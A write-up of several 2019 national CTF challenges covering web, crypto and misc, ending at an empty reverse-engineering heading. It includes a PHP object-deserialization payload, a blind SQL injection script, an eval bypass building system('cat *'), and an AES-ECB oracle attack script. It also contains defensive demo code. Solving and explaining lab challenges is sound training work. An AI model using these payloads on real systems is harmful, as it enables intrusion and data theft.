Writeups for some of the 2019 国赛 challenges --- NEX的小老妹

安恒网络空间安全讲武堂
Published 2019-05-14 18:09:43

Sign-in challenge

Three people face the camera and get the flag.

flag{87e37d95-6a48-4463-aff8-b0dbd27d3b7d}

WEB

JustSoso

Following the hint, there is probably a file inclusion. Trying php://filter/convert.base64-encode/resource=index.php dumps the source. index.php:

```php
<?php
error_reporting(0);
$file = $_GET["file"];
$payload = $_GET["payload"];
if (!isset($file)) {
    echo 'Missing parameter' . '<br>';
}
if (preg_match("/flag/", $file)) {
    die('hack attacked!!!');
}
@include($file);
if (isset($payload)) {
    // the "flag" filter is applied to the query string as parse_url sees it
    $url = parse_url($_SERVER['REQUEST_URI']);
    parse_str($url['query'], $query);
    foreach ($query as $value) {
        if (preg_match("/flag/", $value)) {
            die('stop hacking!');
            exit();
        }
    }
    $payload = unserialize($payload);
} else {
    echo "Missing parameters";
}
?>
```

hint.php

```php
<?php
class Handle {
    private $handle;
    public function __wakeup() {
        // wipes every property when the object is unserialized
        foreach (get_object_vars($this) as $k => $v) {
            $this->$k = null;
        }
        echo "Waking up\n";
    }
    public function __construct($handle) {
        $this->handle = $handle;
    }
    public function __destruct() {
        $this->handle->getFlag();
    }
}
class Flag {
    public $file;
    public $token;
    public $token_flag;
    function __construct($file) {
        $this->file = $file;
        $this->token_flag = $this->token = md5(rand(1, 10000));
    }
    public function getFlag() {
        $this->token_flag = md5(rand(1, 10000));
        if ($this->token === $this->token_flag) {
            if (isset($this->file)) {
                echo @highlight_file($this->file, true);
            }
        }
    }
}
?>
```

First look at the filter: `$url = parse_url($_SERVER['REQUEST_URI']);`. This is the interesting part: parse_url is used to process the URI, and it has a bug that can be bypassed with `///` (see http://www.am0s.com/functions/406.html).

Next, the deserialization. The Handle class calls handle->getFlag() in its destructor, so we can pass in a Flag object as handle. Then we need to bypass `$this->token === $this->token_flag`, which we try to do with a PHP reference. Handle's __wakeup() clears the properties, so it also has to be bypassed; CVE-2016-7124 does that. Finally, $handle is private, so the %00 bytes must be added and URL-encoded. PHP code to generate the serialized payload:

```php
<?php
// needs the Handle and Flag classes from hint.php above
require_once 'hint.php';

$f = new Flag("flag.php");
$f->token = &$f->token_flag;   // reference: token and token_flag now always compare identical
$a = new Handle($f);
$as = serialize($a);
echo urlencode($as) . "<br>";
echo $as;
```

payload:

```text
///index.php?file=hint.php&payload=O%3A6%3A"Handle"%3A2%3A%7Bs%3A14%3A"%00Handle%00handle"%3BO%3A4%3A"Flag"%3A3%3A%7Bs%3A4%3A"file"%3Bs%3A8%3A"flag.php"%3Bs%3A5%3A"token"%3Bs%3A32%3A"50abc3e730e36b387ca8e02c26dc0a22"%3Bs%3A10%3A"token_flag"%3BR%3A4%3B%7D%7D
```

flag{bdf9c526-1d57-4eb4-9ec7-d9198e2e987c}

The simplest SQL injection

sleep, or, if, |, and BENCHMARK are replaced with QwQ, so time-based blind injection is basically out and only boolean-based blind injection is left. The trick: pow(1,22222222) = 1 while pow(0,2222222) raises an error, so the page's response tells the two cases apart and gives us a boolean oracle. Script:

```python
# coding=utf-8
import requests
import string

# The base of pow() is (condition)+1, so the two outcomes of pow() differ
# and the page's response tells them apart.
exp = "a' and pow(((ascii(mid((select group_concat(b) from (select 'a','b' union select * from user)a),{1},1))={0})+1),222222222);#"
url = "http://39.97.227.64:52105/"
user = ''
while True:
    for j in range(10000):
        print(j)
        for i in string.digits + string.ascii_letters + "!@#$%^&*()_+-/={[}]|,.`~":
            expt = exp.format(ord(i), j)
            # print(expt)
            data = {
                'username': expt,
                'password': "passwd"
            }
            res = requests.post(url, data=data)
            if "操作" in res.text:
                if i == "'":
                    continue
                user = user + i
                print(user)
                break
```

This yields the login password.

That recalled the DDCTF MySQL weak-password challenge with arbitrary file read; see https://www.anquanke.com/post/id/106488 and use this script: [https://github.com/allyshka/Rogue-MySql-Server](https://github.com/allyshka/Rogue-MySql-Server)

Change the path, then read the file.

Final flag:

flag{3f4abe8b-aa4a-bb48-c2f9f04d045beade}

Love math

Looking at the page source shows that calc.php is called; visiting it shows its source.

At the end there is an eval, i.e. command execution, so the general idea is to bypass the blacklist and abuse the whitelist to run commands. We recalled p神's blog post on writing a shell without letters or digits, and the trick on Xianzhi (https://xz.aliyun.com/t/3537): use base_convert to build the command. base_convert(1751504350,10,36)(base_convert(784,10,36)), i.e. system(ls), produces output.

We then tried to read a file, but could not get around the space and length limits, and there are very few usable points left, so only the whitelist can be used. The whitelisted function names can be operated on as strings; brute-forcing shows that XOR-ing them can produce ' *':

```php
<?php
error_reporting(0);
$list1 = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'base_convert', 'bindec', 'ceil', 'cos', 'cosh', 'decbin', 'dechex', 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];
$list2 = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'base_convert', 'bindec', 'ceil', 'cos', 'cosh', 'decbin', 'dechex', 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];
// bounds were <= in the original, which reads one element past each list
for ($x = 0; $x < count($list1); $x++) {
    for ($y = 0; $y < count($list2); $y++) {
        for ($z = 0; $z <= 20; $z++) {
            // PHP XORs strings byte-wise and truncates to the shorter operand
            $c = (dechex($z) ^ $list1[$x] ^ $list2[$y]);
            if ($c == " *") {
                echo $list1[$x] . " " . $list2[$y] . " " . $z;
                echo "<br>";
            }
        }
    }
}
```

This gives atan^pow^dechex(17) = ' *', so the final file-reading payload is base_convert(1751504350,10,36)(base_convert(15941,10,36).(atan^pow^dechex(17))); reading the source then gives the flag.
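From the defender's side, the lesson is that a whitelist of raw function names is not enough once base_convert and string XOR can manufacture names. The following is an added example (not the challenge code or the writeup's script): a small de-obfuscator that rewrites base_convert(N,10,36), dechex(N) and bare-word XOR chains into the string literals PHP would actually see, so the payload above decodes to 'system'('cat *'). The regexes and the list of dangerous names are my own assumptions.

```python
import re

DIGITS36 = "0123456789abcdefghijklmnopqrstuvwxyz"
# Names a "calculator" should never end up calling (assumed list for the demo)
DANGEROUS = {"system", "exec", "passthru", "shell_exec", "popen", "eval"}


def to_base36(n: int) -> str:
    """What PHP's base_convert(n, 10, 36) returns (lower-case digits)."""
    if n == 0:
        return "0"
    out = []
    while n:
        n, rem = divmod(n, 36)
        out.append(DIGITS36[rem])
    return "".join(reversed(out))


def php_str_xor(a: str, b: str) -> str:
    """PHP's ^ on two strings: byte-wise XOR, truncated to the shorter operand."""
    return "".join(chr(ord(x) ^ ord(y)) for x, y in zip(a, b))


_TOKEN = r"(?:'[^']*'|\w+)"


def _unquote(tok: str) -> str:
    return tok[1:-1] if tok.startswith("'") else tok


def deobfuscate(expr: str) -> str:
    """Rewrite the name-building tricks into the literals PHP would produce."""
    # base_convert(N,10,36) yields a lower-case alphanumeric string
    expr = re.sub(r"base_convert\((\d+),\s*10,\s*36\)",
                  lambda m: "'" + to_base36(int(m.group(1))) + "'", expr)
    # dechex(N) yields the hex digits of N as a string
    expr = re.sub(r"dechex\((\d+)\)",
                  lambda m: "'" + format(int(m.group(1)), "x") + "'", expr)

    # a^b^c on bare words: PHP treats an undefined constant as its own name
    def fold(m):
        parts = [_unquote(t) for t in m.group(0).split("^")]
        acc = parts[0]
        for part in parts[1:]:
            acc = php_str_xor(acc, part)
        return "'" + acc + "'"
    expr = re.sub(_TOKEN + r"(?:\^" + _TOKEN + r")+", fold, expr)

    # 'a'.'b' (operand optionally parenthesised) concatenates to one literal
    concat = r"'([^']*)'\.\(?'([^']*)'\)?"
    while re.search(concat, expr):
        expr = re.sub(concat, lambda m: "'" + m.group(1) + m.group(2) + "'", expr)
    return expr


def calls_dangerous(expr: str) -> bool:
    """True if, once decoded, the expression calls a name from DANGEROUS."""
    return any(name in DANGEROUS
               for name in re.findall(r"'([^']*)'\s*\(", deobfuscate(expr)))


if __name__ == "__main__":
    payload = "base_convert(1751504350,10,36)(base_convert(15941,10,36).(atan^pow^dechex(17)))"
    print(deobfuscate(payload))      # 'system'('cat *')
    print(calls_dangerous(payload))  # True
```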

flag{652bc92a-ea94-443f-98ee-2cab5c3c90b8}

Crypto

puzzles

question 0: throw it into WolframAlpha.

question 1: four numbers are given, three of them known. Searching for them turns up http://prime389.blog70.fc2.com/?m&no=101, where they are all primes. A short script to look up their positions in that list:

```python
# the prime list copied from the page found above
a = '''26364809, 26364823, 26364827, 26364847, 26364881, 26364889, 26364893, 26364901, 26364931, 26364941, 26364967, 26364983, 26364991, 26364997, 26365007, 26365021, 26365037, 26365039, 26365049, 26365057, 26365081, 26365099, 26365109, 26365111, 26365123, 26365133, 26365139, 26365169, 26365177, 26365187, 26365231, 26365243, 26365289, 26365301, 26365333, 26365363, 26365393, 26365399, 26365403, 26365421, 26365463, 26365511, 26365517, 26365519, 26365523, 26365541, 26365561, 26365601, 26365607, 26365621, 26365643, 26365649, 26365681, 26365721, 26365733, 26365741, 26365771, 26365777, 26365783, 26365789, 26365799, 26365811, 26365817, 26365819, 26365873, 26365877, 26365883, 26365891, 26365909, 26365943, 26365987, 26365991, 26366003, 26366023, 26366033, 26366059, 26366071, 26366077, 26366117, 26366141, 26366147, 26366149, 26366159, 26366173, 26366189, 26366203, 26366227, 26366231, 26366233, 26366273, 26366287, 26366317, 26366323, 26366341, 26366369, 26366383, 26366393, 26366407, 26366419, 26366429, 26366447, 26366453, 26366477, 26366491, 26366497, 26366503, 26366537, 26366551, 26366581, 26366591, 26366603, 26366621'''
primes = a.replace("\n", "").replace(" ", "").split(",")
# positions of the three known numbers
print(primes.index('26364809'))
print(primes.index('26366033'))
print(primes.index('26366621'))
```

The positions look like an arithmetic progression, so the missing number is presumably 26365399.

question 2: a calculus problem; the team's top student solved it: 7700

question 3: a physics problem. Magnetic flux Φ = BS = B·π·r² = 16π; EMF E = ΔΦ/Δt = 2·π·r·B·(dr/dt) = 80π = (part3·π)/233, so part3 = 18640

question 4: a calculus problem; a homework-search app gives the result: part4 = 40320

flag{01924dd7-1e14-48d0-9d80-fa6bed9c7a00}

warmup

An original problem from the October 安恒杯 (Anheng Cup). Over nc we can obtain the AES encryption of our input, or of (our input + flag). The AES here is ECB, 16 bytes per block. So consider the following: suppose the flag is flag{xxxxxxxxx}. If we enter 123456789012345 (15 characters), the flag's content has to move forward by one position, so the first encrypted block is actually 123456789012345f. Then we encrypt 123456789012345f; if the first 16 bytes of the two results are identical, that proves the first character of the flag is f. Let's try it first.

Then we can write a script to run this; the script is as follows:

```python
import socket

HOST = '08560bfda40f2691789fc1b246a80c4e.kr-lab.com'
PORT = 54321
sock = socket.socket()
sock.connect((HOST, PORT))
szBuf = sock.recv(1024)
print(szBuf)
t = str(2222222222222) + '\n'
sock.send(t.encode('utf-8'))
szBuf = sock.recv(1024)
print(szBuf)
t = '1234567890' + '\n'
sock.send(t.encode('utf-8'))
szBuf = sock.recv(1024)
print(szBuf)

temp = '{-1234567890}abcdefghijklmnopqrstuvwxyz_?#@!'          # candidate flag characters
payload = '00000000000000000000000000000000012345678912345'   # 47-byte prefix
x = ''                                                        # flag recovered so far
for j in range(1, 60):
    for i in temp:
        print(i)
        t = (payload + '\n').encode('utf-8')
        print("-----------")
        print(payload)
        print(payload + x + i)
        print("-----------")
        sock.send(t)                        # ciphertext of prefix + flag
        szBuf = sock.recv(1024)
        xxx = szBuf[0:103]
        p = (payload + x + i + '\n').encode('utf-8')
        sock.send(p)                        # ciphertext of prefix + known part + guess
        szBuf = sock.recv(1024)
        yyy = szBuf[0:103]
        if xxx == yyy:                      # identical leading blocks: the guess is right
            print(x + "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx")
            x = x + i
            payload = payload[0:47 - j]     # shorten the prefix by one for the next byte
            print(payload)
            break
```

Finally we get the flag.
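To show why the block comparison above works without a live service, here is an added example (not the writeup's script) that reproduces the byte-at-a-time recovery against a local stand-in oracle. The "block cipher" is a truncated HMAC rather than AES, which is enough because ECB's weakness only needs equal input blocks to give equal output blocks; the secret, key and zero padding are constructed for the demo.

```python
import hashlib
import hmac

BLOCK = 16
# Constructed for the demo: the secret the oracle appends and the key of the stand-in cipher.
SECRET = b"flag{ecb_1s_w34k}"
KEY = b"demo-key"


def fake_block_cipher(block: bytes) -> bytes:
    """Stand-in for one AES-ECB block (assumption, not AES): a keyed, deterministic
    16-byte map. The ECB property is all that matters: equal input -> equal output."""
    return hmac.new(KEY, block, hashlib.sha256).digest()[:BLOCK]


def ecb_oracle(prefix: bytes) -> bytes:
    """Like the challenge service: encrypts prefix + SECRET block by block (zero padded)."""
    data = prefix + SECRET
    data += b"\x00" * (-len(data) % BLOCK)
    return b"".join(fake_block_cipher(data[i:i + BLOCK])
                    for i in range(0, len(data), BLOCK))


def recover_secret(oracle) -> bytes:
    """Byte-at-a-time recovery described above: pad so that exactly one unknown byte
    lands at the end of a block, then compare that block against each guess."""
    alphabet = bytes(range(0x20, 0x7f))          # printable ASCII candidates
    recovered = b""
    while True:
        pad = b"0" * (BLOCK - 1 - len(recovered) % BLOCK)
        blk = len(recovered) // BLOCK
        lo, hi = blk * BLOCK, (blk + 1) * BLOCK
        reference = oracle(pad)[lo:hi]           # block holding the next unknown byte
        for cand in alphabet:
            guess = pad + recovered + bytes([cand])
            if oracle(guess)[lo:hi] == reference:
                recovered += bytes([cand])
                break
        else:
            return recovered                     # only padding left: done


if __name__ == "__main__":
    print(recover_secret(ecb_oracle))   # b'flag{ecb_1s_w34k}'
```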

Asymmetric

The challenge was broken at first: the given .py file imported flag but never used it, so we thought some trick was involved. gmpy2.iroot gives p; then compute d and decrypt directly. Code:

```python
import gmpy2
import base64
from Crypto.Util.number import long_to_bytes, bytes_to_long

e = 58134567416061346246424950552806959952164141873988197038339318172373514096258823300468791726051378264715940131129676561677588167620420173326653609778206847514019727947838555201787320799426605222230914672691109516799571428125187628867529996213312357571123877040878478311539048041218856094075106182505973331343540958942283689866478426396304208219428741602335233702611371265705949787097256178588070830596507292566654989658768800621743910199053418976671932555647943277486556407963532026611905155927444039372549162858720397597240249353233285982136361681173207583516599418613398071006829129512801831381836656333723750840780538831405624097443916290334296178873601780814920445215584052641885068719189673672829046322594471259980936592601952663772403134088200800288081609498310963150240614179242069838645027877593821748402909503021034768609296854733774416318828225610461884703369969948788082261611019699410587591866516317251057371710851269512597271573573054094547368524415495010346641070440768673619729280827372954003276250541274122907588219152496998450489865181536173702554116251973661212376735405818115479880334020160352217975358655472929210184877839964775337545502851880977049299029101466287659419446724781305689536816523774995178046989696610897508786776845460908137698543091418571263630383061605011820139755322231913029643701770497299157169690586232187419462594477116374977216427311975598620616618808494138669546120288334682865354702356192972496556372279363023366842805886601834278434406709218165445335977049796015123909789363819484954615665668979
n = 754600786340927688096652328072061561501667781193760284816393637647032362908189628005150802929636396969230958922073774180726205402897453096041624408154494621307262657492560975357997726055874834308239749992507552325614973631556754707427580134609221878324704469965450463088892083264951442562525825243127575048386573246756312509362222667015490013299327398464802116909245529065994770788125182846841016932803939806558559335886481214931253578226314057242462834149031625361286317307273138514126289052003214703248070256059405676891634792175775697355408418965738663732479622148276007308404691800186837579126431484536836513358124181380166971922188839934522356902295160649189850427580493328509329115798694580347461641487270793993129066433242544366683131231903590153844590595882428219010673818765995719694470668924781499987923250883546686344997580959954960334567874040563037167422839228466141912000421309282727363913908613116739074234989825489075148091144771967111113068647060175231126374070143480727000247378471525286907200601035581143391602569836131345909055708005758380081303860198696570649330092070410465978479841469533490522594827330661914537170063053059393550673731195548189192109328158876774080143171304333338291909598353550442855717204721
p = 27469997931214477761614767108186031567315036376083132392426996667627218749539695067248042591583909179084701435672160685775817300735625565681316931013796736475063262607704602169127345932808228340127651954510616128241670424036014879415455623394081339453271845448205451563064839423245503714379366851744076108861445013040104633032165239781810818675751597470203543193701129345733547475908441315395948934439272351686827840533139470474080751283584826092493989661762657864506486606709856249052957276749808634865316990803862670123015171486148705503812500313554891199205784097280219458478633286017402718458309597972808845785689
p1 = 165740755190793304655854506052794072378181046252118367693457385632818329041540419488625472007710062128632942664366383551452498541560538744582922713808611320176770401587674618121885719953831122487280978418110380597358747915420928053860076414097300832349400288770613227105348835005596365488460445438176193451867
c = '''YXmuOsaD1W4poLAG2wPrJ/nYZCkeOh2igCYKnZA6ecCeJadT6B3ZVTciPN6LJ8AcAsRXNnkC6+9P NJPhmosSG5UGGbpIcg2JaZ1iA8Sm3fGiFacGvQsJOqqIWb01rjaQ3rDBKB331rrNo9QNOfMnjKr0 ejGG+dNObTtvnskICbYbNnSxMxLQF57H5JnWZ3LbbKQ493vmZzwvC6iH8blNPAp3dBlVzDqIAmxm Ubk0OzFjPoHphD1oxHdzXyQNW+sLxVldrf9xcItq92jN5sqBYrG8wADIqY1/sqhTMZvkIYFMHqoM QuiRSnVrCF2h2RtGDEayLo0evgXI/0W3YveyKCHViOnG6wypcBFm91ZWdjp3fVW/4DyxW6xu9hg/ NlXyRP6pT/OyQpcyTqKRuiXJLWgFUJI/8TRgyAjBLLgSd3U0N3VM8kewXw5j+fMUTCW9/Gy4iP8m 52Zabx/vEKdwdGZ0QyvgvAWGUFZ96EK0g1BM/LU9Tuu2R+VKcCSCprg283x6NfYxmU26KlQE6Zrr jLmbCOe0327uaW9aDbLxZytPYIE5ZkzhSsD9JpQBKL30dCy3UKDbcuNgB6SrDddrbIuUd0/kLxuw h6kTqNbC4NDrOT4WAuP4se8GGOK8Wz0dL6rE6FkzMnI4Qg501MTSNQZ4Bp7cNf6H9lTa/4DNOl0='''

# n = p**r: from the values above n = p**2 and p = p1**2, i.e. n = p1**4,
# so phi(n) = p1**4 - p1**3 and d is e's inverse modulo that
d = gmpy2.invert(e, p1**4 - p1**3)
root, exact = gmpy2.iroot(n, 2)   # iroot returns (root, is_exact)
print(root)
print(gmpy2.gcd(e, root))
print(p1**4 - p1**3)
print(long_to_bytes(int(gmpy2.powmod(bytes_to_long(base64.b64decode(c)), d, n))))
```

Simple

```text
Round n part_encode -> 0x92d915250119e12b
Key map -> 0xe0be661032d5f0b676f82095e4d67623628fe6d376363183aed373a60167af537b46abc2af53d97485591f5bd94b944a3f49d94897ea1f699d1cdc291f2d9d4a5c705f2cad89e938dbacaca15e10d8aeaed90236f0be2e954a8cf0bea6112e84
```

Going by the challenge's txt, we try the following: guess that part_encode is the ciphertext after n rounds, and that key map is the set of 16 subkeys. That gives the subkey set:

```python
subkey = []
for i in range(16):
    sub = keymap[6*i: 6+6*i]   # 6 bytes = one 48-bit subkey
    subkey.append(str_to_bit(sub))
```

We introduce a parameter n meaning that part_encode is the ciphertext after the n-th round. To obtain the flag we need 16-n rounds of decryption. Because part_encode is the ciphertext after round n, the first n rounds do not have to be undone; we decrypt only with the keys from round n through round 16. The main function:

```python
if __name__ == "__main__":
    for n in range(15):  # guess n
        part_encode = bytes.fromhex('92d915250119e12b')
        keymap = bytes.fromhex('e0be661032d5f0b676f82095e4d67623628fe6d376363183aed373a60167af537b46abc2af53d97485591f5bd94b944a3f49d94897ea1f699d1cdc291f2d9d4a5c705f2cad89e938dbacaca15e10d8aeaed90236f0be2e954a8cf0bea6112e84')
        subkey = []
        for i in range(16):
            sub = keymap[6*i: 6+6*i]
            subkey.append(str_to_bit(sub))  # the subkeys
        crypto = str_to_bit(part_encode)
        r, l = split(crypto, 32)  # halves taken in swapped order
        result = []
        # start decrypting
        for i in range(16):
            if i < n:  # skip the subkeys of the first n rounds
                continue
            r_ebox = get_across_ebox(r)
            r_xor = xor(subkey[15-i], r_ebox)
            r_sbox = get_across_sbox(r_xor)
            r_pbox = get_across_pbox(r_sbox)
            r_xor1 = xor(l, r_pbox)
            l = r
            r = r_xor1
        result = result + final_transposition(r+l)
        final = bit_to_str(result)
        print("flag{%s}" % final)  # print the result
```

The complete code:

```python
# PC-1 permutation table, outputs 56 bits
PC_1 = [57, 49, 41, 33, 25, 17, 9,
        1, 58, 50, 42, 34, 26, 18,
        10, 2, 59, 51, 43, 35, 27,
        19, 11, 3, 60, 52, 44, 36,
        63, 55, 47, 39, 31, 23, 15,
        7, 62, 54, 46, 38, 30, 22,
        14, 6, 61, 53, 45, 37, 29,
        21, 13, 5, 28, 20, 12, 4]

# LSC, number of left shifts of the key per round
LSC_num = [1, 1, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 1]

# PC-2 permutation table, outputs 48 bits
PC_2 = [14, 17, 11, 24, 1, 5, 3, 28,
        15, 6, 21, 10, 23, 19, 12, 4,
        26, 8, 16, 7, 27, 20, 13, 2,
        41, 52, 31, 37, 47, 55, 30, 40,
        51, 45, 33, 48, 44, 49, 39, 56,
        34, 53, 46, 42, 50, 36, 29, 32]

# Initial transposition, outputs 64 bits
IT = [58, 50, 42, 34, 26, 18, 10, 2,
      60, 52, 44, 36, 28, 20, 12, 4,
      62, 54, 46, 38, 30, 22, 14, 6,
      64, 56, 48, 40, 32, 24, 16, 8,
      57, 49, 41, 33, 25, 17, 9, 1,
      59, 51, 43, 35, 27, 19, 11, 3,
      61, 53, 45, 37, 29, 21, 13, 5,
      63, 55, 47, 39, 31, 23, 15, 7]

# E-box, outputs 48 bits
EBox = [32, 1, 2, 3, 4, 5,
        4, 5, 6, 7, 8, 9,
        8, 9, 10, 11, 12, 13,
        12, 13, 14, 15, 16, 17,
        16, 17, 18, 19, 20, 21,
        20, 21, 22, 23, 24, 25,
        24, 25, 26, 27, 28, 29,
        28, 29, 30, 31, 32, 1]

# S-boxes 1-8, output 32 bits in total
SBox1 = [[14, 4, 13, 1, 2, 15, 11, 8, 3, 10, 6, 12, 5, 9, 0, 7],
         [0, 15, 7, 4, 14, 2, 13, 1, 10, 6, 12, 11, 9, 5, 3, 8],
         [4, 1, 14, 8, 13, 6, 2, 11, 15, 12, 9, 7, 3, 10, 5, 0],
         [15, 12, 8, 2, 4, 9, 1, 7, 5, 11, 3, 14, 10, 0, 6, 13]]

SBox2 = [[15, 1, 8, 14, 6, 11, 3, 4, 9, 7, 2, 13, 12, 0, 5, 10],
         [3, 13, 4, 7, 15, 2, 8, 14, 12, 0, 1, 10, 6, 9, 11, 5],
         [0, 14, 7, 11, 10, 4, 13, 1, 5, 8, 12, 6, 9, 3, 2, 15],
         [13, 8, 10, 1, 3, 15, 4, 2, 11, 6, 7, 12, 0, 5, 14, 9]]

SBox3 = [[10, 0, 9, 14, 6, 3, 15, 5, 1, 13, 12, 7, 11, 4, 2, 8],
         [13, 7, 0, 9, 3, 4, 6, 10, 2, 8, 5, 14, 12, 11, 15, 1],
         [13, 6, 4, 9, 8, 15, 3, 0, 11, 1, 2, 12, 5, 10, 14, 7],
         [1, 10, 13, 0, 6, 9, 8, 7, 4, 15, 14, 3, 11, 5, 2, 12]]

SBox4 = [[7, 13, 14, 3, 0, 6, 9, 10, 1, 2, 8, 5, 11, 12, 4, 15],
         [13, 8, 11, 5, 6, 15, 0, 3, 4, 7, 2, 12, 1, 10, 14, 9],
         [10, 6, 9, 0, 12, 11, 7, 13, 15, 1, 3, 14, 5, 2, 8, 4],
         [3, 15, 0, 6, 10, 1, 13, 8, 9, 4, 5, 11, 12, 7, 2, 14]]

SBox5 = [[2, 12, 4, 1, 7, 10, 11, 6, 8, 5, 3, 15, 13, 0, 14, 9],
         [14, 11, 2, 12, 4, 7, 13, 1, 5, 0, 15, 10, 3, 9, 8, 6],
         [4, 2, 1, 11, 10, 13, 7, 8, 15, 9, 12, 5, 6, 3, 0, 14],
         [11, 8, 12, 7, 1, 14, 2, 13, 6, 15, 0, 9, 10, 4, 5, 3]]

SBox6 = [[12, 1, 10, 15, 9, 2, 6, 8, 0, 13, 3, 4, 14, 7, 5, 11],
         [10, 15, 4, 2, 7, 12, 9, 5, 6, 1, 13, 14, 0, 11, 3, 8],
         [9, 14, 15, 5, 2, 8, 12, 3, 7, 0, 4, 10, 1, 13, 11, 6],
         [4, 3, 2, 12, 9, 5, 15, 10, 11, 14, 1, 7, 6, 0, 8, 13]]

SBox7 = [[4, 11, 2, 14, 15, 0, 8, 13, 3, 12, 9, 7, 5, 10, 6, 1],
         [13, 0, 11, 7, 4, 9, 1, 10, 14, 3, 5, 12, 2, 15, 8, 6],
         [1, 4, 11, 13, 12, 3, 7, 14, 10, 15, 6, 8, 0, 5, 9, 2],
         [6, 11, 13, 8, 1, 4, 10, 7, 9, 5, 0, 15, 14, 2, 3, 12]]

SBox8 = [[13, 2, 8, 4, 6, 15, 11, 1, 10, 9, 3, 14, 5, 0, 12, 7],
         [1, 15, 13, 8, 10, 3, 7, 4, 12, 5, 6, 11, 0, 14, 9, 2],
         [7, 11, 4, 1, 9, 12, 14, 2, 0, 6, 10, 13, 15, 3, 5, 8],
         [2, 1, 14, 7, 4, 10, 8, 13, 15, 12, 9, 0, 3, 5, 6, 11]]
SBox = [SBox1, SBox2, SBox3, SBox4, SBox5, SBox6, SBox7, SBox8]

# P-box, outputs 32 bits
PBox = [16, 7, 20, 21, 29, 12, 28, 17,
        1, 15, 23, 26, 5, 18, 31, 10,
        2, 8, 24, 14, 32, 27, 3, 9,
        19, 13, 30, 6, 22, 11, 4, 25]

# Final transposition, outputs 64 bits
FT = [40, 8, 48, 16, 56, 24, 64, 32,
      39, 7, 47, 15, 55, 23, 63, 31,
      38, 6, 46, 14, 54, 22, 62, 30,
      37, 5, 45, 13, 53, 21, 61, 29,
      36, 4, 44, 12, 52, 20, 60, 28,
      35, 3, 43, 11, 51, 19, 59, 27,
      34, 2, 42, 10, 50, 18, 58, 26,
      33, 1, 41, 9, 49, 17, 57, 25]


# split a list into sub-lists of size n
def split(s, n):
    return [s[k:k+n] for k in range(0, len(s), n)]


# initial transposition of the plaintext
def initial_transposition(plain):
    plain_it = [plain[IT[i]-1] for i in range(64)]
    return plain_it


# E-box expansion
def get_across_ebox(plain_it_r):
    plain_ebox = [plain_it_r[EBox[i]-1] for i in range(48)]
    return plain_ebox


# decimal -> 4-bit binary string
def dec_to_4bin(dec):
    res = bin(dec).replace('0b', '')
    fix = (4-len(res))*'0'
    return fix+res


# bits -> str
def bit_to_str(array):
    res = ''.join(chr(int(''.join(str(i) for i in byte_bits), 2))
                  for byte_bits in split(array, 8))
    return res


# S-box substitution
def get_across_sbox(plain_ebox):
    plain_sbox = []
    for i in range(8):
        subplain = plain_ebox[i*6:i*6+6]
        row = int(str(subplain[0]) + str(subplain[-1]), 2)
        col = int(str(subplain[1]) + str(subplain[2]) + str(subplain[3]) + str(subplain[4]), 2)
        plain = SBox[i][row][col]
        plain_sbox.append(dec_to_4bin(plain))
    return [int(x) for x in ''.join(plain_sbox)]


# P-box permutation
def get_across_pbox(plain_sbox):
    plain_pbox = [plain_sbox[PBox[i]-1] for i in range(32)]
    return plain_pbox


# final transposition
def final_transposition(plain):
    crypto = [plain[FT[i]-1] for i in range(64)]
    return crypto


# XOR of two bit lists
def xor(m, n):
    return [a ^ b for a, b in zip(m, n)]


# str/bytes -> bit list
def str_to_bit(text):
    array = list()
    for char in text:
        binval = char_to_bin(char, 8)
        array.extend([int(i) for i in list(binval)])
    return array


# character (or byte value) -> binary string of bitsize bits
def char_to_bin(val, bitsize):
    bin_val = bin(val)[2:] if isinstance(val, int) else bin(ord(val))[2:]
    if len(bin_val) > bitsize:
        print("error")
    while (len(bin_val)-bitsize):
        bin_val = "0"+bin_val  # pad with leading zeros
    return bin_val


if __name__ == "__main__":
    for n in range(15):  # guess n
        part_encode = bytes.fromhex('92d915250119e12b')
        keymap = bytes.fromhex('e0be661032d5f0b676f82095e4d67623628fe6d376363183aed373a60167af537b46abc2af53d97485591f5bd94b944a3f49d94897ea1f699d1cdc291f2d9d4a5c705f2cad89e938dbacaca15e10d8aeaed90236f0be2e954a8cf0bea6112e84')
        subkey = []
        for i in range(16):
            sub = keymap[6*i: 6+6*i]
            subkey.append(str_to_bit(sub))  # the subkeys
        crypto = str_to_bit(part_encode)
        r, l = split(crypto, 32)  # halves taken in swapped order
        result = []
        # start decrypting
        for i in range(16):
            if i < n:  # skip the subkeys of the first n rounds
                continue
            r_ebox = get_across_ebox(r)
            r_xor = xor(subkey[15-i], r_ebox)
            r_sbox = get_across_sbox(r_xor)
            r_pbox = get_across_pbox(r_sbox)
            r_xor1 = xor(l, r_pbox)
            l = r
            r = r_xor1
        result = result + final_transposition(r+l)
        final = bit_to_str(result)
        print("flag{%s}" % final)  # print the result
```

Running it gives:

Final flag:

flag{y0ur9Ood}

Misc

saleae

Open the capture with Saleae Logic and configure the analyzer.

flag: flag{12071397-19d1-48e6-be8c-784b89a95e07}

24C

After opening the capture with Saleae Logic, set the protocol analyzer to I2C.

Three segments of the flag show up.

We first reassembled the flag and submitted it several times, and it was wrong. Then we noticed a write at address 0x09, meaning: lay out the original flag, then at the 9th character position replace 9e with ac, which gives the final flag.

Final flag: flag{c46d9e10-e9b5-4d90-a883-41cf163bdf4e}

usbasp

Likewise open the capture with the tool, zoom in, work out which channel carries which signal, configure the analyzer accordingly and get the flag.

Flag: flag{85b084c6-42e6-495c-87b4-46dfb1df58a0}

Reverse

easyGO

